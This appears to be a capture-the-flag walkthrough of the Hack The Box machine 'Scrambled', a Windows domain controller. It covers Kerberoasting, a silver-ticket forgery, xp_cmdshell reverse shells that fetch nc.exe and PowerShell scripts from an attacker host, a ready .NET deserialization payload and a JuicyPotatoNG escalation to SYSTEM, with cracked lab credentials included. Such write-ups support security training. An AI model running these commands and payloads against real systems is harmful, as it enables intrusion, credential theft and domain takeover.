htb-scrambled-nl

Scrambled

Scanning

> TARGET=10.10.11.168 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT      STATE SERVICE       REASON          VERSION
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: Scramble Corp Intranet
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-06-15 23:15:44Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: scrm.local0., Site: Default-First-Site-Name)
|_ssl-date: 2022-06-15T23:18:54+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=DC1.scrm.local
| Subject Alternative Name: othername:<unsupported>, DNS:DC1.scrm.local
| Issuer: commonName=scrm-DC1-CA/domainComponent=scrm
4411/tcp  open  found?        syn-ack ttl 127
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, NCP, NULL, NotesRPC, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|   FourOhFourRequest, GetRequest, HTTPOptions, Help, LPDString, RTSPRequest, SIPOptions: 
|     SCRAMBLECORP_ORDERS_V1.0.3;
|_    ERROR_UNKNOWN_COMMAND;
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49552/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49692/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49696/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

There are many open ports: DNS, Kerberos (88/464), LDAP and LDAPS including the global catalog (3268/3269), SMB, MSSQL, WinRM (5985) and the usual RPC range, so this is a domain controller (DC1.scrm.local). We need to enumerate several of these services.

Several hostnames and domain names turned up that may be useful later:

scrm.local
DC1.scrm.local
scramblecorp.com

Web Enum

Web enum found something interesting: http://scrm.local/support.html

04/09/2021: Due to the security breach last month we have now disabled all NTLM authentication on our network. This may cause problems for some of the programs you use so please be patient while we work to resolve any issues 

http://scrm.local/supportrequest.html shows a screenshot that includes a username, ksimpson.

http://scrm.local/salesorders.html describes a client application used by this organisation; later we will find its server side listening on port 4411.

If you are experiencing a problem with the sales orders app, please enable debug logging and reproduce the problem. You can enable debug logging by doing the following: 

A log file named ScrambleDebugLog will have been created in the same folder you launched the sales app from. Send this file to us via email along with a description of the problem 

Directory enum found only the static pages that are already linked from the site:

> dirsearch -u http://scrm.local/ -x 403,401,500,400 -f
[19:48:54] Starting:
[19:50:00] 301 -  148B  - /assets  ->  http://scrm.local/assets/
[19:50:40] 301 -  148B  - /images  ->  http://scrm.local/images/
[19:50:41] 200 -    2KB - /index.html
[19:51:07] 200 -    2KB - /passwords.html
[19:51:41] 200 -    2KB - /support.html

Fuzzing for further pages didn’t find anything interesting:

> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scrm.local/FUZZ.html"

Subdomain (vhost) enum didn’t find anything useful either:

> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scrm.local/" -H "Host: FUZZ.scrm.local"
> wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://scramblecorp.com/" -H "Host: FUZZ.scramblecorp.com"

So this target probably has no web vector. What the site does give us is a username (ksimpson), the fact that NTLM authentication is disabled, and the existence of the sales orders application.

Host Enum

Host enum with enum4linux finds nothing useful. That is expected here: enum4linux relies on SMB null sessions, which authenticate with NTLM, and the intranet page says NTLM has been disabled on the network.

> enum4linux 10.10.11.168

Port 4411 Enum

Connecting to the non-standard port 4411 with nc returns the banner SCRAMBLECORP_ORDERS_V1.0.3; and any other input is answered with ERROR_UNKNOWN_COMMAND;, matching the nmap fingerprint above. This is the server side of the sales orders application mentioned on the intranet site, but without the client we cannot tell yet which commands it accepts.

> nc -vn 10.10.11.168 4411

LDAP Enum

Perform LDAP enum with the ldap3 Python module, using an anonymous bind over LDAPS:

Python 3.10.4 (main, Mar 24 2022, 13:07:27) [GCC 11.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import ldap3
>>> server = ldap3.Server('10.10.11.168', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
>>> server.info

DSA info (from DSE):
  Supported LDAP versions: 3, 2
  Naming contexts: 
    DC=scrm,DC=local
    CN=Configuration,DC=scrm,DC=local
    CN=Schema,CN=Configuration,DC=scrm,DC=local
    DC=DomainDnsZones,DC=scrm,DC=local
    DC=ForestDnsZones,DC=scrm,DC=local

nmap scan using ldap scripts confirms the above results

> nmap -n -sV --script "ldap* and not brute" 10.10.11.168

Overall, nothing useful at this stage

Kerberos Enum

Perform username enum

> kerbrute userenum -d scrm.local --dc 10.10.11.168 /usr/share/wordlists/SecLists/Usernames/xato-net-10-million-usernames.txt

2022/06/15 20:03:16 >  [+] VALID USERNAME:       administrator@scrm.local
2022/06/15 20:04:30 >  [+] VALID USERNAME:       asmith@scrm.local
2022/06/15 20:06:16 >  [+] VALID USERNAME:       Administrator@scrm.local
2022/06/15 20:07:39 >  [+] VALID USERNAME:       jhall@scrm.local
2022/06/15 20:16:59 >  [+] VALID USERNAME:       sjenkins@scrm.local
2022/06/15 20:18:19 >  [+] VALID USERNAME:       khicks@scrm.local
2022/06/15 20:30:25 >  [+] VALID USERNAME:       Asmith@scrm.local
2022/06/15 20:48:39 >  [+] VALID USERNAME:       ASMITH@scrm.local

We also know from the screenshot that there is probably a user called ksimpson. kerbrute confirms the account exists, and a small password check (pass.txt holds the candidate passwords) shows that the password is the same as the username:

> kerbrute bruteuser -d scrm.local --dc 10.10.11.168 pass.txt ksimpson

With a valid password we can request a TGT for ksimpson with getTGT.py. Since NTLM is disabled, every Impacket tool from here on is run with -k (Kerberos) against this cached ticket, so make sure dc1.scrm.local resolves (add it to /etc/hosts) and that your clock is in sync with the DC (the nmap ssl-date output shows 0s skew here); otherwise Kerberos fails. Note: you may encounter an error when running the getTGT.py script; fix the script according to https://github.com/SecureAuthCorp/impacket/issues/1206

> getTGT.py scrm.local/ksimpson:ksimpson -dc-ip 10.10.11.168
> export KRB5CCNAME=ksimpson.ccache
> impacket-GetUserSPNs scrm.local/ksimpson -k -dc-ip dc1.scrm.local -no-pass -request

The first attempt at GetUserSPNs with -k fails. Some Googling shows that the author of this box has raised an issue on the Impacket GitHub for this very error, titled “GetUserSpns.py fails when using -k option and NTLM auth is disabled”. The suggested fix in that issue is to change one line so the script uses the KDC host given on the command line instead of resolving the machine name over SMB (which needs NTLM); in my copy this is line 260:

        if self.__doKerberos:
            #target = self.getMachineName()
            target = self.__kdcHost

After making that change, it dumps the RC4-encrypted service ticket (etype 23; often called a “hash”, although it isn’t one) for the sqlsvc account, which holds the MSSQLSvc SPNs:

 

┌──(puck㉿kali)-[~/htb/scrambled]
└─$ python3 GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-ip dc1.scrm.local -request -k
Impacket v0.11.0 - Copyright 2023 Fortra

ServicePrincipalName          Name    MemberOf  PasswordLastSet             LastLogon                   Delegation
----------------------------  ------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 17:32:02.351452  2023-10-13 15:08:55.430424
MSSQLSvc/dc1.scrm.local       sqlsvc            2021-11-03 17:32:02.351452  2023-10-13 15:08:55.430424

$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$09051c16c6b00ac737cc62f4fa5dec17$[...]

Save the ticket to a file mssqlsvc-hash and crack it with john:

┌──(puck㉿kali)-[~/htb/scrambled]
└─$ john --format=krb5tgs --wordlist=/usr/share/wordlists/rockyou.txt mssqlsvc-hash 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Pegasus60 (?) 
1g 0:00:00:03 DONE (2023-10-13 16:12) 0.2652g/s 2846Kp/s 2846Kc/s 2846KC/s Petergrant..Pearce
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

We now have a service account credential, sqlsvc:Pegasus60. It cracked in seconds because the ticket was issued with etype 23 (RC4), which is far cheaper to brute-force offline than AES.

Foothold

Silver ticket: we hold the password (and therefore the NT hash) of sqlsvc, the account the MSSQLSvc/dc1.scrm.local service runs as. Service tickets for that SPN are encrypted with that account's key, so we can forge one for any user, including Administrator, and the SQL service will accept it because it decrypts and trusts the ticket itself without consulting the KDC. This is a silver ticket, scoped to that one service; a golden ticket would need the krbtgt hash and would work against every service in the domain. For background on the mechanism see https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket

To forge the ticket we need the NT hash of the service account's password and the domain SID.

Get the domain SID with getPac, authenticating as sqlsvc:

┌──(puck㉿kali)-[~/htb/scrambled]
└─$ impacket-getPac -targetUser sqlsvc scrm.local/sqlsvc:Pegasus60 | grep "Domain SID" 
Domain SID: S-1-5-21-2743207045-1827831105-2542523200

Generate the NT hash (MD4 over the UTF-16LE encoding) of the password `Pegasus60`. I used https://codebeautify.org/ntlm-hash-generator, which gives b999a16500b87d17ec7f2e2a68778f05; it is better to compute this locally than to paste a live domain credential into a third-party website.

Forge the ticket as Administrator. impacket-ticketer sets the user RID to 500 by default, which is the built-in Administrator account in every domain; the SPN must match the one the service uses (MSSQLSvc/dc1.scrm.local). See Microsoft's documentation on well-known RIDs for background.

┌──(puck㉿kali)-[~/htb/scrambled]
└─$ impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSVC/dc1.scrm.local Administrator 
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache

Connect to mssql via the impersonated ticket

┌──(puck㉿kali)-[~/htb/scrambled]
└─$ export KRB5CCNAME=Administrator.ccache

┌──(puck㉿kali)-[~/htb/scrambled]
└─$ klist 
Ticket cache: FILE:Administrator.ccache
Default principal: Administrator@SCRM.LOCAL

Valid starting Expires Service principal
10/13/2023 16:28:55 10/10/2033 16:28:55 MSSQLSVC/dc1.scrm.local@SCRM.LOCAL
renew until 10/10/2033 16:28:55

┌──(puck㉿kali)-[~/htb/scrambled]
└─$ impacket-mssqlclient dc1.scrm.local -k
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)> select name, database_id from sys.databases;
name         database_id
----------   -----------
master                 1
tempdb                 2
model                  3
msdb                   4
ScrambleHR             5

SQL (SCRM\administrator dbo@master)> SELECT TABLE_NAME FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;
TABLE_NAME
----------
Employees
UserImport
Timesheets

SQL (SCRM\administrator dbo@master)> SELECT * from ScrambleHR.dbo.UserImport;
LdapUser   LdapPwd             LdapDomain   RefreshInterval   IncludeGroups
--------   -----------------   ----------   ---------------   -------------
MiscSvc    ScrambledEggs9900   scrm.local                90               0

SQL (SCRM\administrator dbo@master)>

Enable xp_cmdshell and check which account the SQL Server service runs as:

> enable_xp_cmdshell
> xp_cmdshell whoami

Upload nc.exe and create a reverse shell. The download path must be somewhere the service account can write; xp_cmdshell runs from C:\Windows\system32 (as the shell prompt later confirms), so the relative path ..\..\Temp resolves to C:\Windows\Temp:

> xp_cmdshell certutil.exe -urlcache -f http://10.10.16.3/nc.exe ..\..\Temp\nc.exe
> xp_cmdshell ..\..\Temp\nc.exe 10.10.16.3 4444 -e cmd.exe

Upload SharpHound.exe (I used /usr/lib/bloodhound/resources/app/Collectors/DebugBuilds/SharpHound.exe), run it on the target and transfer the collected zip back to Kali for analysis:

> certutil.exe -urlcache -f http://10.10.16.3/sh.exe sh.exe

BloodHound shows a user tstar in the IT group with the CanPSRemote edge to the DC. After some trial and error this turned out to be useless.

Post-Exploitation Enum

Upload winPEAS:

> certutil.exe -urlcache -f http://10.10.16.3/p.exe p.exe

# winPEAS findings of interest: the sales orders service binary (unquoted path) and the network shares
ScrmOrders(Scramble Sales Orders Server)[C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe 4411] - Auto - Running - No quotes and Space detected

[+] Network Shares
ADMIN$ (Path: C:\Windows)
C$ (Path: C:\)
HR (Path: C:\Shares\HR) -- Permissions: AllAccess
IPC$ (Path: )
IT (Path: C:\Shares\IT) -- Permissions: AllAccess
NETLOGON (Path: C:\Windows\SYSVOL\sysvol\scrm.local\SCRIPTS)
Public (Path: C:\Shares\Public) -- Permissions: AllAccess
Sales (Path: C:\Shares\Sales) -- Permissions: AllAccess
SYSVOL (Path: C:\Windows\SYSVOL\sysvol)

There is a PDF document in C:\Shares\Public that says HR keeps a database, which may contain user passwords.

Check the databases for user passwords. From the sqlsvc shell, sqlcmd connects with Windows authentication; -Q runs one query and exits (-q would leave sqlcmd waiting for interactive input):

> sqlcmd -Q "select name from sys.databases"

Check the tables in ScrambleHR:

> sqlcmd -Q "use ScrambleHR; select table_name from information_schema.tables"

# found
Employees
UserImport
Timesheets

Check the content of UserImport, which holds the LDAP credential of the MiscSvc account:

> sqlcmd -Q "use ScrambleHR; select db_name(); select * from UserImport;"

MiscSvc is an IT user and therefore also has CanPSRemote, but evil-winrm with the password doesn’t work: it authenticates with NTLM by default, which is disabled on this network (it would need Kerberos set up via its -r realm option).

To get a reverse shell instead, use the “PowerShell #3 (Base64)” payload from revshells.com:

SQL> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAG[...]


kali@kali:~/Documents/HTB/Scrambled$ nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.64] from (UNKNOWN) [10.10.11.168] 57867
whoami
scrm\sqlsvc
PS C:\Windows\system32>

Now we need a second reverse shell as MiscSvc to obtain the user flag. From the sqlsvc shell, run the same payload again under MiscSvc's credentials; Invoke-Command to dc1 goes over WinRM with Kerberos, which is what evil-winrm from Kali could not do:

To do so, execute the following commands:

$SecPassword = ConvertTo-SecureString 'ScrambledEggs9900' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('Scrm\MiscSvc', $SecPassword)
Invoke-Command -Computer dc1 -Credential $Cred -ScriptBlock {<SAME PAYLOAD AS BEFORE>}

Privilege Escalation

From the earlier enum there is a server application at C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe listening on port 4411.

tasklist /v shows N/A in the user name column for that process. tasklist can only report the owner of processes our account is allowed to open, so the service is probably running as a more privileged account:

> tasklist /v

We can however read C:\Shares\IT, which holds a copy of the sales orders client application and its DLL. Copy both to C:\Temp and transfer them to Kali with nc:

* Copy these two files to c:\temp
> nc.exe 10.10.16.3 7777 < ScrambleLib.dll
> nc.exe 10.10.16.3 7777 < ScrambleClient.exe
* On kali
> nc -vnlp 7777 > ScrambleLib.dll
> nc -vnlp 7777 > ScrambleClient.exe

Reverse Eng

strings already shows what look like protocol command names:

> strings ScrambleLib.dll

Set up ILSpy (https://github.com/icsharpcode/ILSpy) and decompile the DLL:

> /root/.dotnet/tools/ilspycmd -p -o decompile ScrambleLib.dll

Reading the decompiled code shows how the commands work: the body of an order command is base64-decoded and deserialized with .NET's BinaryFormatter, so the server deserializes attacker-controlled input.

Use ysoserial.net (https://github.com/pwntester/ysoserial.net) to generate a .NET deserialization payload; it has to be run on Windows. The WindowsIdentity gadget with the BinaryFormatter formatter wraps a command that downloads and runs a PowerShell reverse shell from our web server:

> ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "powershell.exe Invoke-Command -Computer dc1 -ScriptBlock { IEX(New-Object Net.WebClient).downloadString('http://10.10.16.3/shell.ps1') }"

Host shell.ps1 on the web server and start a nc listener for the reverse shell, then connect to the target's port 4411 (10.10.11.168, not our own address) and send the payload as an UPLOAD_ORDER command:

> nc 10.10.11.168 4411
> UPLOAD_ORDER;AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAA8ApBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBdGdZOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0T0NJL1BnMEtQRTlpYW1WamRFUmhkR0ZRY205MmFXUmxjaUJOWlhSb2IyUk9ZVzFsUFNKVGRHRnlkQ0lnU1hOSmJtbDBhV0ZzVEc5aFpFVnVZV0pzWldROUlrWmhiSE5sSWlCNGJXeHVjejBpYUhSMGNEb3ZMM05qYUdWdFlYTXViV2xqY205emIyWjBMbU52YlM5M2FXNW1lQzh5TURBMkwzaGhiV3d2Y0hKbGMyVnVkR0YwYVc5dUlpQjRiV3h1Y3pwelpEMGlZMnh5TFc1aGJXVnpjR0ZqWlRwVGVYTjBaVzB1UkdsaFoyNXZjM1JwWTNNN1lYTnpaVzFpYkhrOVUzbHpkR1Z0SWlCNGJXeHVjenA0UFNKb2RIUndPaTh2YzJOb1pXMWhjeTV0YVdOeWIzTnZablF1WTI5dEwzZHBibVo0THpJd01EWXZlR0Z0YkNJK0RRb2dJRHhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWEl1VDJKcVpXTjBTVzV6ZEdGdVkyVStEUW9nSUNBZ1BITmtPbEJ5YjJObGMzTStEUW9nSUNBZ0lDQThjMlE2VUhKdlkyVnpjeTVUZEdGeWRFbHVabTgrRFFvZ0lDQWdJQ0FnSUR4elpEcFFjbTlqWlhOelUzUmhjblJKYm1adklFRnlaM1Z0Wlc1MGN6MGlMMk1nY0c5M1pYSnphR1ZzYkM1bGVHVWdTVzUyYjJ0bExVTnZiVzFoYm1RZ0xVTnZiWEIxZEdWeUlHUmpNU0F0VTJOeWFYQjBRbXh2WTJzZ2V5QkpSVmdvVG1WM0xVOWlhbVZqZENCT1pYUXVWMlZpUTJ4cFpXNTBLUzVrYjNkdWJHOWhaRk4wY21sdVp5Z25hSFIwY0Rvdkx6RXdMakV3TGpFMkxqTXZjMmhsYkd3dWNITXhKeWtnZlNJZ1UzUmhibVJoY21SRmNuSnZja1Z1WTI5a2FXNW5QU0o3ZURwT2RXeHNmU0lnVTNSaGJtUmhjbVJQZFhSd2RYUkZibU52WkdsdVp6MGllM2c2VG5Wc2JIMGlJRlZ6WlhKT1lXMWxQU0lpSUZCaGMzTjNiM0prUFNKN2VEcE9kV3hzZlNJZ1JHOXRZV2x1UFNJaUlFeHZZV1JWYzJWeVVISnZabWxzWlQwaVJtRnNjMlVpSUVacGJHVk9ZVzFsUFNKamJXUWlJQzgrRFFvZ0lDQWdJQ0E4TDNOa09sQnliMk5sYzNNdVUzUmhjblJKYm1adlBnMEtJQ0FnSUR3dmMyUTZVSEp2WTJWemN6NE5DaUFnUEM5UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJdVQySnFaV04wU1c1emRHRnVZMlUrRFFvOEwwOWlhbVZqZEVSa0dRHRlFjbTkyYVdSbGNqNEwL

The server deserializes the order, the embedded command runs, and the reverse shell comes back as the account running ScrambleServer.exe; catch the root flag.

rooted

Alternative Roots

Unintended File Read Via MSSQL

Wh04m1 got root blood on Scrambled using this technique. This post on MSSQL Tips talks about how to read a file using MSSQL using the BULK option, which was added to SQL Server 2005. Their example query is:

SELECT BulkColumn 
FROM OPENROWSET (BULK 'c:\temp\mytxtfile.txt', SINGLE_CLOB) MyFile 

OPENROWSET returns a single column named BulkColumn. MyFile is a correlation name (a table alias for the rowset); it has to be present, but what I put there doesn’t matter.

OPENROWSET, when used with the BULK provider takes a file path and one of three keywords:

  • SINGLE_BLOB returns as a varbinary
  • SINGLE_CLOB returns as a varchar
  • SINGLE_NCLOB returns as a nvarchar

So to read root.txt, I’ll run:

SQL> SELECT BulkColumn FROM OPENROWSET(BULK 'C:\users\administrator\desktop\root.txt', SINGLE_CLOB) MyFile
BulkColumn

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   

b'a01b823bd0d7c97c98646d36d1d03c02\r\n' 

RoguePotato

Get Execution Via MSSQL

To get to a place where I could run RoguePotato, I’ll need to be executing with the SeImpersonatePrivilege. I’m most likely to find this through the MSSQL service.

To run commands via MSSQL, I’ll use the xp_cmdshell stored procedure. If I try to run this initially, it will fail:

SQL> xp_cmdshell whoami
[-] ERROR(DC1): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

I can reconfigure that with the following four lines:

SQL> EXECUTE sp_configure 'show advanced options', 1
[*] INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE
SQL> EXECUTE sp_configure 'xp_cmdshell', 1
[*] INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL> RECONFIGURE

Now it works:

SQL> xp_cmdshell whoami
output

--------------------------------------------------------------------------------

scrm\sqlsvc

NULL   

Privilege Check

The service is running as scrm\sqlsvc, which does have SeImpersonate:

SQL> xp_cmdshell whoami /priv
output
--------------------------------------------------------------------------------
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
NULL

JuicyPotatoNG

RoguePotato will work on Scrambled, but I’ll use this opportunity to show off JuicyPotatoNG, the latest Potato which was released just over a week before Scrambled retired.

The details of the exploit can be found here, and involve a significant understanding of Windows internals details.

Practically speaking, I can download the compiled exe from the release page, and serve it from my webserver along with two other files:

  • nc64.exe, which I’ll use to get a reverse shell
  • rev.bat, which simply invokes nc64.exe to return a reverse shell to my VM:
    C:\\programdata\\nc64.exe -e cmd 10.10.14.6 443
    

Staging out of C:\ProgramData\, I’ll upload all three to Scrambled from MSSQL:

SQL> xp_cmdshell powershell curl 10.10.14.6/nc64.exe -outfile C:\\programdata\\nc64.exe
output
--------------------------------------------------------------------------------
NULL
SQL> xp_cmdshell powershell curl 10.10.14.6/rev.bat -outfile C:\\programdata\\rev.bat
output
--------------------------------------------------------------------------------
NULL
SQL> xp_cmdshell powershell curl 10.10.14.6/JuicyPotatoNG.exe -outfile C:\\programdata\\jp.exe
output
--------------------------------------------------------------------------------
NULL

Now with nc listening on my host, I’ll invoke JuicyPotatoNG:

SQL> xp_cmdshell C:\\programdata\\jp.exe -t * -p C:\\programdata\\rev.bat
output
--------------------------------------------------------------------------------
NULL
NULL
         JuicyPotatoNG
         by decoder_it & splinter_code
NULL
[*] Testing CLSID {854A20FB-2D44-457D-992F-EF13785D2B51} - COM server port 10247
[+] authresult success {854A20FB-2D44-457D-992F-EF13785D2B51};NT AUTHORITY\SYSTEM;Impersonation
[+] CreateProcessWithTokenW OK
[+] Exploit successful!
NULL 

It reports success, and there is a shell running as SYSTEM at nc:

puck@kali$ rlwrap nc -nlvp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.168 63184
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
